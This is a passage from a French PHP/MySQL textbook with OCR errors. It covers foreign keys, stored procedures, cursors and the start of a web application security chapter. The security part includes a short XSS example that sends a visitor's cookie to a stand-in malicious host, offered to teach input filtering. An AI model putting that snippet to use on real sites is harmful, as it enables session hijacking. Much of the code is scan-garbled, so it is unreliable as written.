primary key (idcommande, isbn) 
) type=InnoDB; 

Les termes references commandes (idcommande) apres idcommande signifient que cette 
colonne est une cle etrangere qui doit contenir une valeur de la colonne idcommande de 
la table commandes. 

Pour finir, nous avons ajoute le type de table type=InnoDB a la fin de la declaration. 
Cette indication est requise pour que les cles etrangeres fonctionnent. 

Vous pouvez egalement apporter ces modifications a une table existante, en utilisant des 
instructions ALTER TABLE : 

alter table livres_commandes type=InnoDB; 
alter table livres_commandes 

add foreign key (idcommande) references commandes(idcommande) ; 

Pour voir si la modification a fonctionne, essayez d'inserer une ligne avec un idcommande 
qui n'existe pas dans la table commandes : 

insert into livres_commandes values (77, '0-672-31697-8', 7); 

Vous devriez alors obtenir une erreur comme celle-ci : 

ERROR 1452 (23000): Cannot add or update a child row: 
a foreign key constraint fails 

Les procedures stockees 

Une procedure stockee est une fonction creee et stockee a l'interieur de MySQL. Cette 
fonction peut etre constitute d' instructions SQL et d'un certain nombre de structures de 
controle speciales. Elle peut etre utile lorsque vous souhaitez executer la meme fonc- 
tion a partir de diverses applications ou plates-formes ou pouvoir encapsuler des 
fonctionnalites. Les procedures stockees dans une base de donnees peuvent etre consi- 
derees comme analogues a l'approche orientee objet en programmation. Elles vous 
permettent de controler le mode d'acces aux donnees. 

Commencons par un exemple simple. 
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Un exemple simple 

Le Listing 13.1 declare une procedure stockee. 

Listing 13.1 : procedure_stockee_basique.sql — Declaration d'une procedure stockee 

# Exemple simple de procedure stockee 
delimiter // 

create procedure total_commandes (out total float) 
BEGIN 

select sum(montant) into total from commandes; 
END 

// 

delimiter ; 



Etudions ce code ligne par ligne. 
La premiere instruction : 
delimiter // 

modifie le delimiteur de fin d'instruction en remplacant sa valeur courante (en general, 
un point- virgule, a moins que vous ne l'ayez changee precedemment) par une double 
barre de fraction. Cette etape est necessaire afin de pouvoir utiliser le delimiteur de 
point-virgule dans la procedure stockee lorsque vous entrez le code de la procedure 
sans que MySQL n'essaie d'executer le code en cours de route. 

La ligne suivante : 

create procedure total_commandes (out total float) 

cree la procedure stockee elle-meme. Le nom de cette procedure est total commandes. 
Elle possede un unique parametre, appele total, qui correspond a la valeur que vous 
essayez de calculer. Le terme OUT indique que ce parametre est passe en mode sortie 
(c'est la fonction qui le remplira). 

Les parametres peuvent egalement etre declares en mode IN, qui signifie que la valeur 
est passee a la procedure, ou en mode INOUT, qui signifie que la valeur est passee a la 
procedure mais que cette derniere peut la modifier. 

Le terme float indique le type du parametre. Ici, on renvoie un total de toutes les 
commandes de la table commandes. Le type de la colonne montant de commandes etant 
float, c'est une valeur de ce type qui sera done renvoyee. Les types de donnees 
autorises dans les procedures stockees sont les memes que les types de colonne auto- 
rises. 
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Si vous souhaitez passer plusieurs parametres, vous pouvez utiliser une liste de parametres 
separes par des virgules, comme en PHP. 

Le corps de la procedure est entoure par les instructions BEGIN et END. Ces instruc- 
tions sont analogues aux accolades en PHP ({}) car elles delimitent un bloc 
d'instructions. 

Le corps de la procedure execute simplement une instruction SELECT. La seule diffe- 
rence par rapport a une instruction normale tient a ce que Ton utilise la clause into 
total afin de charger le resultat de la requete dans le parametre total. 

Apres avoir declare la procedure, on redefmit le delimiteur comme etant le point- 
virgule : 

delimiter ; 

Une fois que la procedure a ete declaree, vous pouvez l'appeler en utilisant le mot-cle 
call, comme ici : 

call total_commandes(@t) ; 

Cette instruction appelle la procedure total commandes en lui passant une variable 
pour recuperer le resultat. Vous devez ensuite examiner cette variable : 

select @t; 

Le resultat doit etre de la forme : 

+ + 

I « | 

+ + 

| 289.92001152039 | 

+ + 

Vous pouvez egalement creer des fonctions. Une fonction accepte uniquement des para- 
metres en mode lecture et renvoie une seule valeur. 

Comme le montre le Listing 13.2, la syntaxe de base est quasiment identique. 

Listing 13.2 : fonction_basique.sql — Declaration d'une fonction stockee 

# syntaxe de base pour creer une fonction 
delimiter // 

create function prix_ttc(prix float) returns float 
return prix * 1.1; 

// 



delimiter ; 
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Comme vous pouvez le constater, cet exemple utilise le mot-cle function au lieu de 
procedure, mais il y a egalement deux autres differences. 

Les parametres n'ont pas besoin d'etre precises en tant que IN ou OUT car ils sont neces- 
sairement tous en mode IN. Apres la liste des parametres, vous pouvez voir la clause 
returns float. Elle indique le type de la valeur de retour. Ce type, ici aussi, peut etre 
n'importe quel type MySQL valide. 

Pour renvoyer une valeur, on utilise l'instruction return, comme en PHP. 

Notez que cet exemple n'utilise pas les instructions BEGIN et END. Vous pourriez les utili- 
ser, mais elles ne sont pas requises. Comme en PHP, si un bloc d' instructions ne contient 
qu'une seule instruction, vous n'avez pas besoin d'en marquer le debut et la fin. 

L'appel d'une fonction est un peu different de l'appel d'une procedure. Vous pouvez 
appeler une fonction stockee de la meme maniere que vous appelleriez une fonction 
predefmie : 

select prix_ttc(100) ; 

Cette instruction doit produire le resultat suivant : 

+ + 

| prix_ttc(100) | 

+ + 

I 110 I 

+ + 

Vous pouvez visualiser le code utilise pour defmir les procedures et les fonctions stockees 
a 1' aide des instructions suivantes : 

show create procedure total_commandes; 

ou 

show create function prix_ttc; 
Vous pouvez les supprimer avec : 
drop procedure total_commandes; 

ou 

drop function prix_ttc; 

Les procedures stockees offrent la possibilite d'utiliser des structures de controle, des 
variables, des gestionnaires DECLARE (comme les exceptions) et des curseurs. Nous 
allons examiner chacun de ces outils dans les sections qui suivent. 

Variables locales 

Vous pouvez declarer des variables locales dans un bloc begin . . . end en utilisant une 
instruction declare. Vous pourriez, par exemple, modifier la fonction prix ttc de 
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maniere a utiliser une variable locale pour stacker le taux de la taxe, comme le montre 
le Listing 13.3. 

Listing 13.3 : fonction_basique.sql — Declaration d'une fonction stockee avec 
des variables 



# Syntaxe de base pour creer une fonction 
delimiter // 

create function prix_ttc (prix float) returns float 
begin 

declare taxe float default 0.10; 
return prix * (1 + taxe); 
end 

// 

delimiter ; 



Comme vous pouvez le constater, vous declarez la variable avec declare suivi du nom 
de la variable. La clause default est facultative et permet d'affecter une valeur initiale 
a la variable. Vous pouvez ensuite utiliser la variable de facon classique. 

Curseurs et structures de controle 

Etudions un exemple plus complexe. Ici, on veut ecrire une procedure stockee qui 
determine la commande dont le montant est le plus grand et en retourne ridentifiant 
idcommande (on pourrait evidemment obtenir le meme resultat avec une simple requete, 
mais nous voulons montrer ici comment utiliser les curseurs et les structures de 
controle). Le code de cette procedure stockee est presente dans le Listing 13.4. 

Listing 13.4 : structures_controle_curseurs.sql — Utilisation de curseurs et de boucles 
pour traiter un ensemble resultat 



# Procedure permettant de retrouver 1' idcommande du plus grand montant 

# Peut etre realisee avec max, mais illustre les principes des procedures 

# stockees 

delimiter // 

create procedure max_commande(out max_id int) 
begin 

declare cet_id int; 

declare cejnontant float; 

declare l_montant float default 0.0; 

declare l_id int; 

declare fini int default 0; 
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declare continue handler for sqlstate '02000' set fini = 1; 
declare c1 cursor for select idcommande, montant from commandes; 

open c1 ; 
repeat 

fetch c1 into cet_id, cejnontant ; 
if not fini then 

if cejnontant > l_montant then 
set l_montant = cejnontant; 
set l_id = cet_id; 
end if; 
end if; 
until fini end repeat; 
close c1 ; 

set max_id = l_id; 

end 

// 

delimiter ; 



Ce code utilise des structures de controle (des structures conditionnelles et des 
boucles), des curseurs et des gestionnaires declare. Etudions-le ligne par ligne. 

Au debut de la procedure, on declare un certain nombre de variables locales a utiliser 
dans la procedure. Les variables cet id et ce montant stockent les valeurs de idcom 
mande et de montant pour la ligne courante. Les variables 1 montant et 1 id stockent le 
montant de commande le plus eleve et l'identifiant correspondant. Comme on veut 
determiner le plus grand montant en comparant chaque valeur a la valeur la plus elevee 
actuellement, on initialise cette variable a zero. 

La variable suivante est fini, qui est initialisee a zero (faux). Cette variable sert de test 
de boucle. Lorsqu'il n'y a plus de ligne a examiner, on le positionne a 1 (vrai). 

La ligne : 

declare continue handler for sqlstate '02000' set fini = 1; 

est appelee gestionnaire declare. Elle ressemble a une exception dans les procedures 
stockees. Vous pouvez egalement implementer des gestionnaires continue et des 
gestionnaires exit. Les gestionnaires continue, comme celui presente ici, realisent 
Taction indiquee puis poursuivent l'execution de la procedure, tandis que les gestion- 
naires exit quittent le bloc begin . . . end le plus proche. 

La partie suivante du gestionnaire declare indique a quel moment le gestionnaire sera 
appele. Ici, il sera appele lorsque sqlstate '02000' est atteint, ce qui est un moyen 
cryptique de signifier que l'appel se fera lorsque aucune ligne n'est trouvee. Vous trai- 
tez un ensemble resultat ligne par ligne et, lorsque vous etes a court de lignes, ce 
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gestionnaire sera appele. Vous pourriez egalement indiquer FOR NOT FOUND, ce qui est 
equivalent. Les autres options sont SQLWARNING et SQLEXCEPTION. 

Vient ensuite un curseur. Celui-ci s'apparente assez a un tableau. II recupere un 
ensemble resultat d'une requete (comme celui renvoye par mysqli query ( )) et vous 
permet de le traiter ligne par ligne (comme vous le feriez par exemple avec 
mysqli fetch row( )). Considerez le curseur suivant : 

declare c1 cursor for select idcommande, montant from commandes; 

Ce curseur est appele c1. II ne s'agit que d'une definition de ce qu'il va contenir. La 
requete ne sera pas encore executee. 

La ligne suivante : 
open c1 ; 

execute la requete elle-meme. Pour obtenir chaque ligne de donnees, vous devez execu- 
ter une instruction fetch. Cela se fait dans une boucle repeat. Dans le cas present, la 
boucle ressemble a ceci : 

repeat 

until fini end repeat; 

Notez que la condition (until fini) n'est pas verifiee avant la fin. Les procedures stockees 
supportent egalement les boucles while de la forme suivante : 

while condition do 
end while; 

II existe aussi des boucles loop, de la forme suivante : 
loop 

end loop 

Ces boucles ne possedent pas de conditions integrees, mais on peut les quitter a l'aide 
d'une instruction leave;. 

Notez qu'il n' existe pas de boucles for. 

Toujours dans notre exemple, la ligne suivante du code extrait une ligne de donnees : 

fetch c1 into cet_id, ce_montant; 

Cette ligne recupere une ligne a partir de la requete du curseur. Les deux attributs 
recuperes par la requete sont stockes dans les deux variables locales specifiees. 

On verifie si une ligne a ete recuperee puis on compare le montant de la boucle actuelle 
avec le montant maximal stocke, au moyen de deux instructions I F : 

if not fini then 

if ce montant > 1 montant then 
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set ljnontant = cejnontant ; 
set l_id = cet_id; 
end if; 
end if; 

Notez que les valeurs de variable sont definies au moyen de 1' instruction set. 

Outre if... then, les procedures stockees disposent egalement d'une structure 
if . . . then . . . else de la forme suivante : 

if condition then 

[elseif condition then] 

[else] 
end if 

II existe egalement une instruction case, qui possede la forme suivante : 

case valeur 

when valeur then instruction 

[when valeur then instruction ...] 

[else instruction] 
end case 

Pour revenir a notre exemple, une fois que la boucle a termine, il reste un peu de 
nettoyage a faire : 

close c1 ; 

set max_id = l_id; 
L' instruction close ferme le curseur. 

Pour finir, vous positionnez le parametre OUT a la valeur que vous avez calculee. Vous 
pouvez utiliser le parametre non pas comme une variable temporaire mais uniquement 
pour stocker la valeur finale (cet emploi est semblable a celui d'autres langages de 
programmation, comme Ada). 

Si vous creez cette procedure comme on l'a indique ici, vous pouvez l'appeler comme 
vous avez appele 1' autre procedure : 

call max_commande(@l) ; 
select @1; 

Vous devriez obtenir une sortie comme celle-ci : 

+ + 

I el I 

+ + 

I 3 | 

+ + 

Vous pouvez verifier par vous-meme que le calcul est correct. 
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Pour aller plus loin 

Dans ce chapitre, nous avons propose un rapide tour d'horizon des procedures stockees. 
Pour en apprendre plus sur ce sujet, consultez le manuel MySQL. 

Pour plus d' informations sur LOAD DATA INFILE, sur les differents moteurs de stockage 
et sur les procedures stockees, consultez egalement le manuel MySQL. 

Si vous voulez en savoir plus sur les transactions et la coherence des bases de donnees, 
nous vous conseillons de vous procurer un bon livre sur les bases de donnees relation- 
nelles, comme An Introduction to Database Systems, de C. J. Date. 

Pour la suite 

Nous avons a present traite les notions fondamentales de PHP et de MySQL. Au chapitre 
suivant, nous aborderons le probleme de la securite des applications web. 
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Dans ce chapitre, nous continuerons notre etude de la securite des applications en 
examinant comment securiser la totalite d'une application web. Chaque composant doit 
evidemment etre protege contre les mauvaises utilisations eventuelles (accidentelles ou 
volontaires) ; nous developperons done certaines strategies de developpement pour 
nous aider dans cette tache. 

Strategies de securite 

L'un des principaux interets d'Internet, son ouverture et l'accessibilite reciproque 
entre toutes les machines qu'il relie, est egalement l'un des pires cauchemars des 
developpeurs d' applications web. II y a tant d'ordinateurs relies entre eux qu'il est sur 
que certains utilisateurs connectes ont tout sauf de louables intentions. Avec tout ce 
danger qui nous entoure, exposer a tout le reseau une application gerant des informa- 
tions confidentielles comme des numeros de cartes de credits, des informations 
bancaires ou personnelles peut sembler assez perilleux. Mais le commerce doit conti- 
nuer et nous devons voir plus loin que la simple securisation de nos applications : 
nous devons developper une approche pour prevoir et traiter les problemes de secu- 
rite. L'essentiel, ici, est de trouver une approche qui trouve un equilibre entre la 
necessite de nous proteger et celle de realiser nos affaires et d' avoir une application 
fonctionnelle. 

Partir du bon pied 

La securite n'est pas une fonctionnalite. Lorsque Ton developpe une application web et 
que Ton choisit les fonctionnalites qu'on souhaite y inclure, la securite ne fait pas partie 
de la liste des taches et on ne charge pas un developpeur d'y travailler pendant quelques 
jours. La securite doit faire partie integrante de la conception et e'est un effort sans fin 
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qui se poursuit meme apres le deploiement de 1' application et lorsque l'activite de deve- 
loppement a ralenti ou cesse. 

En ayant a 1' esprit et en prevoyant des le debut les differents moyens par lesquels notre 
systeme peut etre attaque et par ou il pourrait etre compromis, nous pouvons concevoir 
notre code afin de reduire la probabilite d' apparition de ces problemes. Cela nous evite 
egalement de devoir tout modifier par la suite, lorsque nous nous serons finalement inte- 
resses au probleme. 

Trouver un equilibre entre la securite et la facilite d'utilisation 

L'une des plus grandes inquietudes lors de la conception d'un systeme accessible aux 
utilisateurs concerne leurs mots de passe. Les utilisateurs choisiront souvent des mots 
de passe qui sont assez faciles a decouvrir a l'aide d'un programme specialise, surtout 
s'ils utilisent des mots issus du dictionnaire. Nous aimerions done trouver un moyen 
de reduire ce risque afin que le systeme ne puisse pas etre attaque par cette breche de 
securite. 

Une solution possible consisterait a faire en sorte que chaque utilisateur passe par 
quatre boites de dialogue pour se connecter, chacune demandant un mot de passe 
distinct. Nous pourrions aussi exiger qu'il change ces quatre mots de passe au moins 
une fois par mois et l'empecher de reutiliser un mot de passe precedent. Notre systeme 
serait bien plus securise et les pirates devraient passer beaucoup plus de temps pour y 
penetrer. 

Malheureusement, un tel systeme serait si securise que personne ne voudrait l'utiliser : 
a un moment donne, tout utilisateur trouverait que cela ne vaut simplement pas la peine 
de s'embeter avec toutes ces tracasseries. Cet exemple illustre le fait que, si la prise en 
compte de la securite est importante, il est tout aussi important de se soucier de son 
impact sur l'utilisation du systeme. Un systeme simple a utiliser et peu securise plaira 
aux utilisateurs mais risquera egalement de poser plus de problemes lies a la securite et 
plus d' interruption de service. De meme, un systeme tellement securise qu'il est a peine 
utilisable attirera peu d' utilisateurs et aura egalement un effet tres negatif sur votre 
commerce. 

En tant que concepteurs d' applications web, nous devons done rechercher des moyens 
d'ameliorer la securite sans compliquer de facon disproportionnee l'utilisation du 
systeme. Comme tout ce qui est lie aux interfaces utilisateur, il n'existe pas de regies 
preetablies que nous pourrions suivre, et il faut faire appel a son propre jugement, a des 
tests d'utilisation et a des groupes d' utilisateurs representatifs pour etudier leurs reactions 
par rapport a nos prototypes et a nos choix de conception. 
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Surveiller la securite 

Lorsqu'on a fini de developper une application web et qu'on l'a deployee sur des 
serveurs en production pour que les gens commencent a l'utiliser, le travail n'est pas 
fini. Une partie de la securite consiste a surveiller le systeme pendant qu'il fonctionne, 
en examinant les fichiers journaux et les autres fichiers pour etudier son comportement 
et la facon dont il est utilise. Ce n'est qu'en examinant soigneusement le fonction- 
nement d'un systeme (ou en ecrivant et en executant des outils pour realiser automati- 
quement une partie de cet audit) que Ton peut detecter les problemes de securite 
potentiels et les parties sur lesquelles il sera peut-etre necessaire de passer plus de 
temps pour developper des solutions plus securisees. 

La securite, malheureusement, est une guerre continue qui, dans un certain sens, ne 
pourra jamais etre gagnee. Une vigilance constante, des ameliorations apportees au 
systeme et une reaction rapide a tous les problemes sont le prix a payer pour disposer 
d'une application web qui fonctionne correctement. 

Une approche de base 

Pour disposer d'une solution de securite qui soit la plus complete possible au prix 
d'un effort raisonnable, nous decrirons une approche en deux parties. La premiere 
suit ce que nous avons deja explique : comment prevoir la securite d'une application 
et y integrer des fonctionnalites qui nous aiderons a conserver cette securite. Comme 
nous aimons bien donner des noms a tout, nous pourrions qualifier cette approche de 
descendante. 

La seconde partie, par contraste, pourrait etre appelee approche ascendante. Au cours 
de cette phase, nous examinons tous les composants de notre application, comme le 
SGBDR utilise, le serveur lui-meme et le reseau sur lequel il se trouve. Nous verifions 
que non seulement nos interactions avec ces composants sont securisees, mais que leur 
installation et leur configuration le sont egalement. De nombreux produits sont fournis 
avec des configurations qui les laissent vulnerables aux attaques, et il est preferable de 
connaitre ces failles et de les combler. 

Identifier les menaces auxquelles nous devrons faire face 

Nous nous interesserons ici a un certain nombre de menaces contre la securite des 
applications web et nous verrons comment modifier nos pratiques de developpement en 
consequence. 
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Acces ou modification de donnees confidentielles 

Une partie de notre travail en tant que concepteurs et developpeurs d' applications 
web consiste a garantir que toutes les donnees que nous confient les utilisateurs sont 
securisees, comme toutes celles que Ton recoit des autres departements. Lorsque Ton 
expose des parties de ces informations aux utilisateurs de notre application, on doit le 
faire de sorte qu'ils ne voient que celles qu'ils sont autorises a consulter et ils ne doivent 
certainement pas voir les informations des autres utilisateurs. 

Si nous ecrivons un frontal pour un systeme de gestion d'actions boursieres, par 
exemple, les personnes qui peuvent avoir acces a nos tables SQL contenant les 
donnees des comptes pourraient retrouver des informations comme les numeros de 
securite sociale des utilisateurs ou des renseignements personnels comme les actions 
possedees par chaque utilisateur (voire, dans certains cas extremes, des renseignements 
bancaires). 

Meme l'exposition d'une table ne contenant que des noms et des adresses est une 
atteinte severe a la securite. Les clients attachent une tres grande importance a leur inti- 
mite et une gigantesque liste de noms et d' adresses, plus certaines informations qui 
pourraient en etre deduites, est un article qui pourrait etre revendu a des societes de 
marketing qui ne respectent pas les regies. 

Si quelqu'un trouve un moyen de modifier ces donnees, la situation est encore pire. Un 
heureux client d'une banque pourrait se retrouver plus riche de plusieurs milliers 
d'euros ou des adresses de livraison pourraient avoir ete modifiees pour qu'un heureux 
client (probablement celui qui aura modifie ces adresses) recoive une bonne quantite de 
colis qui auraient du etre expedies ailleurs. 

Perte ou destruction des donnees 

La suppression de donnees est un probleme aussi grave qu'un acces non autorise a des 
informations confidentielles. Si un pirate arrive a detruire des tables de votre base de 
donnees, votre entreprise peut se trouver dans une situation critique. Si nous sommes 
une banque en ligne qui affiche les informations sur les comptes de ses clients et que 
toutes les donnees d'un compte sont perdues, nous ne sommes pas une banque serieuse. 
Pire encore, si toute la table des utilisateurs est supprimee, nous devrons passer beaucoup 
de temps a reconstruire la base de donnees et a retrouver qui possede quoi. 

Un point important a noter est que la perte ou la destruction de donnees ne provient pas 
forcement d'un pirate ou d'une mauvaise utilisation du systeme. Si l'immeuble dans 
lequel se trouvent nos serveurs brule avec tout son contenu, nous aurons perdu beau- 
coup de donnees et le seul espoir qui nous reste reside dans des sauvegardes bien faites 
et dans un plan de reparation des desastres. 
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Deni de service 

Nous avons deja evoque le potentiel devastateur des attaques par deni de service (DoS) 
et de leurs cousines encore plus serieuses, les attaques par deni de service distributes 
(DDoS). Avoir des serveurs inaccessibles pendant des heures, si ce n'est plus, peut etre 
une situation dont il est difficile de se remettre. Si vous renechissez a la frequentation 
des principaux sites d' Internet et que vous vous rendiez compte que vous vous attendez 
a toujours les trouver la, toute interruption de leur service est un probleme. 

La aussi, un deni de service peut avoir une autre raison qu'une mauvaise utilisation. 
Meme si nous avons de solides sauvegardes stockees en lieu sur, si l'immeuble de nos 
serveurs est detruit par un incendie, emporte par une coulee de boue ou detruit par de 
petits hommes verts venus de l'espace, nous perdrons des clients pour longtemps si 
nous ne sommes pas capables de remettre rapidement en ligne nos machines. 

Injection de code malicieux 

L'injection de code malicieux est un type d'attaque qui a prouve son efficacite sur le 
Web. Le cas le plus fameux est l'attaque par Cross Site Scripting (appele egalement 
XSS pour ne pas le confondre avec l'acronyme des feuilles de style en cascade, CSS). 
Ce qu'il y a de particulierement troublant dans ces attaques est qu'aucune perte de 
donnees n'intervient immediatement mais qu'en revanche un certain code s'execute et 
cause des pertes d' informations a differents degres ou des redirections des utilisateurs 
qu'ils peuvent ne meme pas remarquer. 

Le Cross Site Scripting fonctionne de la facon suivante : 

1. Le pirate saisit dans un formulaire destine a etre lu par d'autres utilisateurs (un 
formulaire de commentaire ou de saisie d' article dans un forum web, par exemple) 
du texte qui ne represente pas seulement le message qu'il veut saisir, mais qui 
contient aussi un script qui s'execute chez le client, comme ici : 

<script> 

this. document = "va.qquepart.mechant?cookie=" + this. cookie; 
</script> 

2. Le pirate soumet le formulaire et attend. 

3. L'utilisateur suivant du systeme qui consultera la page contenant le texte entre par le 
pirate executera le code du script qu'il contient. Dans notre exemple, cet utilisateur 
sera redirige, ainsi que les informations du cookie provenant du site initial. 

Bien qu'il s'agisse ici d'un exemple trivial, les scripts cote client constituent un langage 
tres puissant et les possibilites qu'ils donnent a ce type d'attaque font froid dans le dos. 
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Compromission d'un serveur 

Bien qu'un serveur compromis puisse avoir le meme effet que de nombreuses attaques 
que nous venons de decrire, il faut cependant remarquer que, parfois, le but des intrus 
sera simplement d'obtenir un acces a votre systeme, le plus souvent en tant que super- 
utilisateur (administrateur sur les systemes Windows et root sur les systemes Unix), 
lis seront alors libres de regner sur cet ordinateur et pourront lancer les programmes 
qu'ils veulent, l'eteindre ou installer d'autres logiciels realisant des operations que vous 
n'apprecierez pas vraiment. 

Face a ce type d'attaque, il faut done etre particulierement vigilant, car la premiere 
chose que font les intrus apres avoir penetre sur un serveur consiste a masquer leurs 
traces et leurs actions. 

Savoir a qui Ton a affaire 

Bien que Ton ait tendance a classer instinctivement tous ceux qui posent des problemes 
de securite comme de mauvaises personnes dont le seul but est de nous nuire, ces 
problemes impliquent souvent d'autres acteurs qui y participent malgre eux et qui 
n'apprecieraient pas d'etre traites de pirates. 

Les pirates 

Le groupe le plus evident et le plus connu rassemble ceux que Ton appelle pirates. 
Nous ne ferons pas la confusion classique avec les hackers car la plupart des vrais 
hackers sont tout a fait honnetes et pleins de bonnes intentions. Les pirates tentent, pour 
toutes sortes de raisons, de trouver des faiblesses et les exploitent pour atteindre leur 
but. lis peuvent etre motives par la cupidite s'ils recherchent des informations financie- 
res ou des numeros de cartes de credit ; par l'argent s'ils sont payes par une societe 
concurrente pour obtenir des informations confidentielles sur la votre ; il peut egale- 
ment s'agir de personnes talentueuses pour qui penetrer sur un systeme constitue un 
defi interessant. Bien qu'ils constituent une menace serieuse, ce serait une erreur de 
focaliser tous nos efforts contre eux. 

Utilisateurs victimes de machines infectees 

Outre les pirates, nous devons egalement nous proteger contre un grand nombre 
d'autres personnes. A cause des faiblesses et des failles de securite presentes dans de 
nombreuses parties des logiciels actuels, un pourcentage alarmant de machines sont 
infectees par des programmes qui effectuent toutes sortes d' operations. Les machines 
de certains utilisateurs de votre reseau prive peuvent tres bien avoir ete infectees par de 
tels programmes qui attaqueront votre serveur a leur insu. 
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Employes mecontents 

Les employes de notre societe forment un autre groupe dont il faut nous soucier. Ces 
employes, pour une raison ou pour une autre, peuvent avoir 1' intention de nuire a leur 
entreprise. Quelles que soient leurs motivations, ils peuvent se transformer eux-memes 
en pirates amateurs ou se procurer des outils grace auxquels ils pourront sonder et atta- 
quer les serveurs depuis l'interieur du reseau de la societe. Se proteger du monde exte- 
rieur tout en restant totalement expose en interne ne s'appelle pas etre protege. C'est un 
bon argument en faveur de 1' implementation d'une zone demilitarisee (DMZ, pour 
demilitarized zone), que nous etudierons plus loin. 

Voleurs de materiel 

On omet souvent de se proteger contre un simple vol de materiel. Vous seriez surpris de 
la facilite avec laquelle on peut penetrer dans les bureaux des grandes societes et s'y 
promener sans jamais etre suspecte. Quelqu'un qui se rend au bon endroit et au bon 
moment peut trouver un serveur flambant neuf et des disques pleins de donnees confi- 
dentielles. 

Nous-memes 

Bien que ce soit deplaisant a entendre, l'un des plus gros soucis pour la securite de nos 
systemes sont nous-memes et le code que nous ecrivons. Si nous ne faisons pas atten- 
tion a la securite, si nous ecrivons du code bade et que nous ne nous soucions pas de 
tester et de verifier la securite de notre systeme, nous fournissons une aide precieuse 
aux pirates dans leurs tentatives de compromettre nos serveurs. 

Si vousfaites quelque chose, fait es-le correctement. Internet est particulierement impi- 
toyable envers les negligents ou les faineants. Le plus difficile, pour respecter cette 
maxime, est de convaincre les chefs ou ceux qui signent les cheques que cela en vaut la 
peine. Generalement, il suffit de leur expliquer pendant quelques minutes les effets 
negatifs d'une securite laxiste pour les persuader que 1' effort supplementaire que vous 
reclamez est necessaire dans un monde ou la reputation represente tout. 

Securiser son code 

Passons au second aspect de notre approche de la securite : inspecter separement tous 
les composants et rechercher comment ameliorer leur securite. Nous commencerons 
par etudier tout ce que nous pourrions faire pour que notre code soit stir. Bien que nous 
ne puissions pas montrer ici tout ce qu'il faudrait savoir pour gerer toutes les menaces 
possibles (des tomes entiers ont ete consacres a ces sujets), nous pouvons au moins 
donner quelques conseils generaux et vous indiquer la route a suivre. Nous insisterons 
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sur les problemes de securite lies a 1' utilisation de certaines technologies specifiques en 
PHP lorsque nous les rencontrerons. 

Filtrage des donnees fournies par les utilisateurs 

L'une des mesures les plus importantes que nous pouvons prendre pour ameliorer la 
securite de nos applications web consiste a filtrer toutes les donnees fournies par les 
utilisateurs. 

Les auteurs d' applications doivent filtrer toutes les donnees provenant de sources exter- 
nes, ce qui ne signifie pas que Ton doive concevoir un systeme en supposant que tous 
les utilisateurs sont des escrocs. Nous voulons qu'ils se sentent les bienvenus et nous les 
encourageons evidemment a utiliser nos programmes, mais nous voulons simplement 
etre prepares en cas de mauvaise utilisation de notre systeme. 

Si le filtrage est efficace, nous pouvons reduire de facon non negligeable le nombre 
des menaces exterieures et ameliorer enormement la robustesse du systeme. Meme 
si Ton a entierement confiance en nos utilisateurs, nous ne pouvons pas etre 
certains que leurs machines ne sont pas infectees par un programme malicieux qui 
modifie les requetes adressees a notre serveur ou qui en envoie des fabriquees de 
toutes pieces. 

Les sections qui suivent expliquent comment effectuer ce filtrage. 
Verifier les valeurs attendues 

Parfois, l'utilisateur doit choisir une valeur appartenant a un ensemble bien determine ; 
c'est le cas, par exemple, lorsqu'il doit choisir un mode d'expedition (classique ou 
express), un pays ou une province, etc. Supposons que Ton utilise le formulaire 
suivant : 

<html> 
<head> 

<title>Qui etes-vous ?</title> 
</head> 
<body> 

<form action= ' traite_f orm . php ' method= ' POST ' > 
<input type=' radio' name='sexe' value= ' Masculin 1 />Masculin<br/> 
<input type=' radio' name='sexe' value= ' Feminin>Feminin<br/> 
<input type=' radio 1 name='sexe' value= 'Autre ' />Autre<br/> 
<input type= ' submit ' value= ' Envoyer ' /> 
</f orm> 
</body> 
</html> 

Ce code produira l'affichage presente a la Figure 14.1. Avec ce formulaire, nous pour- 
rions supposer que la valeur de $ P0ST[ 1 sexe ' ] dans traite_fonn.php sera necessairement 
Masculin, Feminin ou Autre. Mais nous aurions completement tort. 
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Qui etes-vous 7 (EET 

- Masculin 

- Fdminin 
Autre 

(* Envoyer ^) 



Termine ^ 



Comme nous l'avons deja indique, le Web repose sur des messages en texte clair, 
envoyes via le protocole HTTP. Un clic sur le bouton Envoyer du formulaire ci-dessus 
provoque l' envoi de messages textuels a destination de notre serveur. Ces messages ont 
une structure analogue a celle de ces lignes : 

POST /traite_form.php HTTP/1.1 

Host: www.mamachine.com 

User-Agent: WoobaBrowser/3 . 4 (Windows) 

Content -Type : application/x-www-f orm-urlencoded 

Content-Length: 11 

sexe=Masculin 

Cependant, rien n'empeche quelqu'un de se connecter a votre serveur web et de lui 
envoyer les valeurs qu'il souhaite, celles-ci par exemple : 

POST /traite_form.php HTTP/1.1 

Host: www.mamachine.com 

User-Agent: WoobaBrowser/3 . 4 (Windows) 

Content -Type : application/x-www-f orm-urlencoded 

Content-Length: 22 

sexe=J+aime+les+cookies . 
Si Ton ecrivait le code suivant : 
<?php 

echo «<E0M 

<p align= ' center 1 > 

Le sexe de 1 ' utilisateur est : {$_P0ST[ 1 sexe ' ] } . 
</p> 
EOM; 

?> 

nous serions embetes un peu plus tard. Une strategic bien meilleure consiste a verifier 
que la donnee qui entre fait partie des valeurs admises, comme ici : 

<?php 

switch ($_P0ST[ 'sexe' ] ) { 



tigure it. i 

Un formulaire 
tres simple. 
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case ' Masculin 1 : 
case ' Feminin ' : 
case 'Autre 1 : 
echo «<E0M 
<p align= 1 center 
Felicitations 
</p> 

EOM; 

break; 

default : 
echo «<E0M 
<p align= 1 center 1 > 
<font color= ' red ' >ATTENTION : </f ont>Valeur incorrecte pour le sexe. 

</p> 

EOM; 

break; 

} 

?> 

II y a un peu plus de code ici, mais nous pouvons au moins etre surs que Ton obtiendra 
une valeur correcte ; ceci est encore plus important lorsque Ton manipule des donnees 
plus financieres que le genre d'un utilisateur. Une regie generale est que vous ne devez 
jamais supposer que la valeur envoy ee par un formulaire appartient a un ensemble de 
valeurs attendues : vous devez toujours le verifier. 

Filtrer me me les valeurs de base 

Les elements des formulaires HTML ne sont pas types et se contentent de transmettre 
au serveur des chames de caracteres (qui peuvent representer des dates, des heures ou 
des nombres). Si un formulaire contient un champ "numerique", vous ne pouvez done 
pas supposer que l'utilisateur y a vraiment saisi un nombre. Meme avec des environne- 
ments ou un code cote client particulierement puissant s'efforce de verifier que les 
donnees saisies correspondent bien au type attendu, il n'y a aucune garantie que ces 
valeurs ne seront pas envoyees directement au serveur, comme on l'a vu dans la section 
precedente. 

Un moyen simple de verifier qu'une valeur est du type attendu consiste a la transtyper 
dans ce type et d'utiliser le resultat, comme ici : 

